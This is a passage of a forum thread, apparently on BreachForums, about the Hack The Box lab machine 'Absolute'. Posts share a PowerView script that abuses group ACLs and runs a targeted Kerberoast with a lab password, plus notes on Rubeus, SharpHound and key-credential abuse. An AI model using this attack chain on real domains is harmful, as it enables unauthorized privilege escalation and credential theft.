Return to forum
Absolute - HTB [Discussion]
by - Thursday, January 1, 1970 at 12:00 AM
Banned
Posts: 23
Threads: 0
Joined: N/A
Reputation: 0

#41
September 25, 2022 at 8:15 PM
(September 25, 2022, 07:55 PM)fl0mms Wrote:
(September 25, 2022, 07:49 PM)user_htb22 Wrote:
(September 25, 2022, 07:48 PM)fl0mms Wrote:
(September 25, 2022, 07:37 PM)Photographer Wrote:
(September 25, 2022, 07:32 PM)fl0mms Wrote: do you need to be in sync? If so, I need help with the synchronization of the clock with the machine.


install ntpdate

sudo ntpdate absolute.htb

I did it but it doesn't change anything.

sudo timedatectl set-ntp false
sudo ntpdate -s absolute.htb

watch the time change

thx bro :heart:


U +welcome
Reply
Member
Member
Posts: 18
Threads: 0
Joined: N/A
Reputation: 0

#42
September 25, 2022 at 8:30 PM
So amazing
Reply
Member
Member
Posts: 23
Threads: 0
Joined: N/A
Reputation: 0

#43
September 25, 2022 at 8:30 PM
(September 25, 2022, 06:56 PM)jahman Wrote:
(September 25, 2022, 06:24 PM)delmerherberth Wrote:
(September 25, 2022, 04:32 PM)technic Wrote: the ldap entry of winrm_user contains msDS-KeyCredentialLink & userCertificate, not sure if it is useful.

X509v3 Extended Key Usage:
    TLS Web Client Authentication, TLS Web Server Authentication
X509v3 Key Usage: critical
    Digital Signature, Key Encipherment


How did you enumerate this exactly? I tried enumerating ldap with ldapsearch and I keep getting error "Matching credential not found"



Maybe not the simplest solution..

- You can convert your ccache file to a kirbi file with ticketConverter.py,
- then import the ticket to a windows box with Rubeus,
- Finally, "SharpHound.exe --domain absolute.htb -c all"


Unfortunately Sharphound isn't connecting to the LDAP. I can use Rubeus to apply the ticket, I can even get one using asktgt but SharpHound isn't taking into account the ticket in my session. I tried the latest version and v1.0.2, 1.0.3, 1.0.4 ... not sure why SharpHound isn't connecting.
Reply
Member
Member
Posts: 15
Threads: 0
Joined: N/A
Reputation: 1

#44
September 25, 2022 at 10:27 PM
Here is how a obtain the winrm_user hash, not cracked for now

$dc_domain="absolute.htb"

$SecPassword = ConvertTo-SecureString "AbsoluteLDAP2022!" -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('absolute.htb\m.lovegod', $SecPassword)

Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Network Audit" -Rights all -DomainController dc.absolute.htb  -principalidentity "m.lovegod"
Add-ADPrincipalGroupMembership -Identity  m.lovegod -MemberOf  'Network Audit' -Credential $Cred -Server dc.absolute.htb
Get-DomainGroupMember -Identity 'network audit' -Domain $dc_domain -DomainController dc.absolute.htb -Credential $cred

$SecPassword = ConvertTo-SecureString "AbsoluteLDAP2022!" -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('absolute.htb\m.lovegod', $SecPassword)

Set-DomainObject "CN=winrm_user,CN=Users,DC=absolute,DC=htb"  -Credential $Cred -Domain absolute.htb  -Server dc.absolute.htb  -SET @{"serviceprincipalname"="nonexistent/BLAHBLAH"}
Get-DomainUser  -Domain absolute.htb  -Server dc.absolute.htb  -Credential $Cred winrm_user  | Select serviceprincipalname
Get-DomainSPNTicket -Credential $Cred -SPN nonexistent/BLAHBLAH
Reply
Member
Member
Posts: 15
Threads: 0
Joined: N/A
Reputation: 1

#45
September 25, 2022 at 11:46 PM
(September 25, 2022, 11:34 PM)Hacker2222 Wrote:
(September 25, 2022, 10:27 PM)jahman Wrote: Here is how a obtain the winrm_user hash, not cracked for now

$dc_domain="absolute.htb"

$SecPassword = ConvertTo-SecureString "AbsoluteLDAP2022!" -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('absolute.htb\m.lovegod', $SecPassword)

Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Network Audit" -Rights all -DomainController dc.absolute.htb  -principalidentity "m.lovegod"
Add-ADPrincipalGroupMembership -Identity  m.lovegod -MemberOf  'Network Audit' -Credential $Cred -Server dc.absolute.htb
Get-DomainGroupMember -Identity 'network audit' -Domain $dc_domain -DomainController dc.absolute.htb -Credential $cred


Set-DomainObject "CN=winrm_user,CN=Users,DC=absolute,DC=htb"  -Credential $Cred -Domain absolute.htb  -Server dc.absolute.htb  -SET @{"serviceprincipalname"="nonexistent/BLAHBLAH"}
Get-DomainUser  -Domain absolute.htb  -Server dc.absolute.htb  -Credential $Cred winrm_user  | Select serviceprincipalname
Get-DomainSPNTicket -Credential $Cred -SPN nonexistent/BLAHBLAH


hmm getting bad credentials with powerview ..


i changed a little bit the code (add a new Credential object  after adding the user to the network group) Hope it will good for you now.

you need to  "Import-Module ActiveDirectory" and powerview, and the box is reseting the ad params very quick
Reply
Member
Member
Posts: 15
Threads: 0
Joined: N/A
Reputation: 1

#46
September 26, 2022 at 12:09 AM
(September 26, 2022, 12:02 AM)Hacker2222 Wrote: i think commandovm didn't install rsat  ....................... maybe that its it


   

Add-DomainObjectAcl is a powerview function. is your DNS client configured to  the box?

   
Add-ADPrincipalGroupMembership is a rsat-powershell
Reply
BreachForums User
VIP
Posts: 213
Threads: 0
Joined: N/A
Reputation: 56

#47
September 26, 2022 at 1:14 PM
If anyone else gets this error when running crackmapexec ldap -k --kdcHost ...:

TypeError: ldap.kerberos_login() missing 1 required positional argument: 'kdcHost'


Turns out there is a bug in crackmapexec 5.2.2: https://pythontechworld.com/issue/byt3bl33d3r/crackmapexec/524
This version comes preinstalled with Kali.
Using cme 5.3.0 downloaded from Github works fine.
Reply
Member
Member
Posts: 23
Threads: 0
Joined: N/A
Reputation: 0

#48
September 26, 2022 at 2:39 PM
(September 25, 2022, 11:50 PM)Hacker2222 Wrote:
(September 25, 2022, 11:46 PM)jahman Wrote:
(September 25, 2022, 11:34 PM)Hacker2222 Wrote:
(September 25, 2022, 10:27 PM)jahman Wrote: Here is how a obtain the winrm_user hash, not cracked for now

$dc_domain="absolute.htb"

$SecPassword = ConvertTo-SecureString "AbsoluteLDAP2022!" -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('absolute.htb\m.lovegod', $SecPassword)

Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Network Audit" -Rights all -DomainController dc.absolute.htb  -principalidentity "m.lovegod"
Add-ADPrincipalGroupMembership -Identity  m.lovegod -MemberOf  'Network Audit' -Credential $Cred -Server dc.absolute.htb
Get-DomainGroupMember -Identity 'network audit' -Domain $dc_domain -DomainController dc.absolute.htb -Credential $cred


Set-DomainObject "CN=winrm_user,CN=Users,DC=absolute,DC=htb"  -Credential $Cred -Domain absolute.htb  -Server dc.absolute.htb  -SET @{"serviceprincipalname"="nonexistent/BLAHBLAH"}
Get-DomainUser  -Domain absolute.htb  -Server dc.absolute.htb  -Credential $Cred winrm_user  | Select serviceprincipalname
Get-DomainSPNTicket -Credential $Cred -SPN nonexistent/BLAHBLAH


hmm getting bad credentials with powerview ..


i changed a little bit the code (add a new Credential object  after adding the user to the network group) Hope it will good for you now.

you need to  "Import-Module ActiveDirectory" and powerview, and the box is reseting the ad params very quick


i mean the first command 

Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Network Audit" -Rights all -DomainController dc.absolute.htb  -principalidentity "m.lovegod"


When I try to set the SPN, I get the following error: "WARNING: [Set-DomainObject] Error setting/replacing properties for object 'winrm_user' : Exception calling "CommitChanges" with "0" argument(s): "Access is denied."

Not sure what's wrong in my setup. I have the RSAT installed and everything.
Reply
Member
Member
Posts: 22
Threads: 0
Joined: N/A
Reputation: 2

#49
September 26, 2022 at 4:02 PM
(September 26, 2022, 12:02 AM)Hacker2222 Wrote: i think commandovm didn't install rsat  ....................... maybe that its it


Win10 Home Edition. no RSAT :(
Reply
Banned
Posts: 23
Threads: 0
Joined: N/A
Reputation: 0

#50
September 26, 2022 at 8:58 PM
(September 26, 2022, 12:21 AM)Hacker2222 Wrote:
(September 26, 2022, 12:09 AM)jahman Wrote:
(September 26, 2022, 12:02 AM)Hacker2222 Wrote: i think commandovm didn't install rsat  ....................... maybe that its it


   

Add-DomainObjectAcl is a powerview function. is your DNS client configured to  the box?

   
Add-ADPrincipalGroupMembership is a rsat-powershell


btw if hash doesn't crack then u prob have to use msDS-KeyCredentialLink on that user (not on toher users LOL)

get this error :

Exception calling "FindAll" with "0" argument(s): "The user name or password is incorrect.
"
At C:\Users\administrador\Desktop\scripts\PowerView.ps1:6663 char:20
+            else { $Results = $ObjectSearcher.FindAll() }
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : DirectoryServicesCOMException

Unable to resolve principal: m.lovegod
At C:\Users\administrador\Desktop\scripts\PowerView.ps1:8529 char:13
+            throw "Unable to resolve principal: $PrincipalIdentity"
+            ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : OperationStopped: (Unable to resolve principal: m.lovegod:String) [], RuntimeException
    + FullyQualifiedErrorId : Unable to resolve principal: m.lovegod


same error what is missing
Reply


 Users viewing this thread: Absolute - HTB [Discussion]: No users currently viewing.